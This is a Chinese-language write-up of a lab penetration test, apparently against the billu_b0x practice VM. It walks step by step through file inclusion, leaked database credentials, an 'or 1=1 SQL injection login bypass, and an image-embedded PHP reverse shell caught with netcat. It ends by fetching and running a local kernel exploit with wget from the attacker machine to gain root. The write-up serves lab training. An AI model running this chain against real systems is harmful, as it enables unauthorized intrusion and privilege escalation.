
目标主机IP：192.168.100.156

../shell/xinxi.sh 156

/in /phpmy /test发现存在文件包含；
包含index.php进来,发现包含了两个头文件；
c.php  查询到了连接数据库的用户名billu，密码b0x_billu；

使用获取到的账户和密码登录数据库；成功登录；

在ica_lab数据库中有一个表是auth（认证的简写）,查看该表中的内容 ,猜测应该是openssh密码或者前面的web登录密码.；
用户名：biLLu，密码：hEx_it



$uname=str_replace('\'','',urldecode($_POST['un']));
$uname=str_replace('\'','',urldecode($_POST['un']));
	$pass=str_replace('\'','',urldecode($_POST['ps']));
	$run='select * from auth where  pass=\''.$pass.'\' and uname=\''.$uname.'\'';
	$result = mysqli_query($conn, $run);
	
	'or 1=1-- -\' 成功绕过登录；
sql注入一个重要的原则就是闭合输入查询，str_replace的作用是将字符串' 替换为空，因此构造SQL注入登录payload时，必须含有'字符串，urldecode的作用是将输入解码。

上传图片木马；
将Kali中的php-reverse-shell.php复制到物理机上重命名为1.php，并修改其中的ip和监听的端口；
合成新的图片Jack.jpg；
copy 1.jpg/b + 1.php/a jack.jpg 

在浏览器中加载hackbar插件；并在Kali上监听端口，执行；
post ->  load=/uploaded_images/jack.jpg&continue=continue

nc -nvlp 1234

uname -a和cat /etc/issus查看系统的版本信息和内核
cat /etc/issue
Ubuntu 12.04.5 LTS \n \l

将shell转换为交互式的tty
python -c 'import pty;pty.spawn("/bin/bash")'  

查询版本信息（也可以使用 lsb_release -a ）；

searchsploit ubuntu 12.04
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) -  | linux/local/37292.c

cp /usr/share/exploitdb/exploits/linux/local/37292.c /var/www/html/37292.c

cd /tmp
wget 192.168.100.143/37292.c
gcc -pthread 37292.c -o exp -lcrypt  
./exp

whoami

一般来说，配置文件都是里面都是很重要的信息，phpmyadmin的默认的配置文件是：config.inc.php；
在linux主机的apach中猜测路径默认在/var/www/phpmy下面；

我们可以采用POST模式包含该配置文件，通过文件包含，读取config.inc.php文件

